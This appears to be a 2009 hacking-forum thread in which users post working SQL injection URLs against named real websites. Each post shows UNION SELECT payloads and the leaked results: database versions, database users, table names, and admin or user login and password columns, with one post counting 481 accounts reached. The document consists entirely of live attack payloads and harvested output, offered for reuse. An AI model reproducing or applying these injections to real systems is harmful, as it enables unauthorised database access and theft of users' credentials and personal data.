http://www.digital-everywhere.com/shop/index.php?page=artikel&pkateg=20+and+1=0+union+select+1,2,3,concat_ws(0x3 a,version(),user(),database()),5--
4.1.22-standard-log:db188898_1@local2:db188898_1
PR4
http://www.game-reviews.ca/news.php?id=1422+and+1=0+union+select+1,concat_ws( 0x3a,login,password),3,4,5,6,7,8,9,10,11+from+admi n--
5.0.67-standard:gamerevi_news@localhost:gamerevi_gamenews
PR3
http://www.adventureplus-bg.com/story.php?id=21+and+1=0+union+select+concat_ws(0x3 a,version(),user(),database())--
4.0.26a:top@sg-acd12:top
PR3
http://juggler.artinact.com/a-imglib/showimg.php?id=15+and+1=0+union+select+1,2,concat_ ws(0x3a,version(),user(),database()),4,5,6,7,8--
4.1.22-standard-log:artinact_juggler@localhost:artinact_juggler
PR3
http://fitnessbuildshealth.com/trainers.php?id=39+and+1=0+union+select+1,2,3,4,5, concat_ws(0x3a,version(),user(),database()),7,8,9, 10,11,12,13,14,15,16--
4.1.20-max-log:start6_ray@71.18.216.33:start6_fit

pelligrim
15.11.2009, 13:34
http://ukrturizm.com.ua/index.php?id=-293+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7--

4.1.25-log:atur@localhost:atur

http://www.tsetse220.com/news.php?id=-142+union+select+1,concat_ws%280x3a,version%28%29, user%28%29,database%28%29%29,3,4,5--

5.0.51a-3ubuntu5.4:root@localhost:tsetse220

http://www.otcheta.net/news.php?id=13005+and+substring%28version%28%29,1, 1%29=4

version: 4.1.25-log

hack-win32
15.11.2009, 20:19
db9330@64.13.192.28:db9330_blog:4.1.25-Debian_mt1
http://www.blamm.com/top10.php?id=-8+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47--



codeglue2@WSWWW07:codeglue2:5.0.85-community-nt
http://www.codeglue.com/game.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19--


rpgui@localhost:RPGuides:5.0.51a-3ubuntu5.4
http://www.rpguides.de/dnd/game.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a,user(),database(),version()),14,15--

hackmen
16.11.2009, 04:21
http://www.rav.org/upper/newsDetail.php?id=170+union+select+1,2,3,4,5,6,7,8 ,9,10--

user:sql@maimonides.org@207.155.252.14
base:maimoDB
os:sun-solaris2.8
mysql.user:sql@maimonides.org

file_priv:N
ver:4.1.22-log

[ id,username,pwd ] from [ users ]
-----------------------------------------

DezMond™
16.11.2009, 12:50
http://www.cg.com.ve/noticia.php?id=-222+union+select+1,concat_ws(0x3a3a,login,contrase na,nombre),3,4,5,6,7,8,9,10,11,12+from+usuarios+li mit+2,1+/*+


http://www.pepedoro.it/pepedoroblog/magazine.php?acts=report&id=-79'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17+/*+


http://www.spotbit.com/main/inside_search.php?&title=6&memberid=-2278+uNiOn+sElEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,8 1,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97, 98,99,100,101,102,103+/*+

$n@ke
16.11.2009, 15:26
yum, but damn, no luck..
http://www.kishwaukeecollege.edu/athletics/player.shtml?id=-216+union+select+1,2,3,4,version(),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19/*

Db: internet
Version: 4.1.22-log
User: interusr@webserver

Sams
16.11.2009, 18:39
openheartsopenminds.org.uk

http://www.openheartsopenminds.org.uk/news.php?id=-530+union+select+1,2,3,version(),5,6+--+

Version: 5.0.45-community-nt
Database: sitesplus
User: sitesplus@localhost

Tables:
http://www.openheartsopenminds.org.uk/news.php?id=-530+union+select+1,2,3,table_name,5,6+from+informa tion_schema.tables+limit+0,1+--+

There is a tb_users table, columns:
user_id
site_id
user_name
user_password
expired

http://www.openheartsopenminds.org.uk/news.php?id=-530+union+select+1,2,3,concat(user_name,0x5A,user_ password),5,6+from+tb_users+limit+0,1+--+

481 accounts in total.

Bb0y
16.11.2009, 19:57
MySQL 5.0.45-community-log
http://www.patfalvey.com/viewnews.php?id=-4+union+select+1,2,column_name,4,5,6,7+from+inform ation_schema.columns+where+table_name=0x6d656d6265 72--
member::m_id,m_name,m_subscribed,m_unsubscribed,m_ email
http://www.patfalvey.com/viewnews.php?id=-4+union+select+1,2,concat_ws(0x0b,m_id,0x3a,m_name ,0x3a,m_subscribed,0x3a,m_unsubscribed,0x3a,m_emai l),4,5,6,7+from+member--
outputs all rows at once.
Error output is disabled.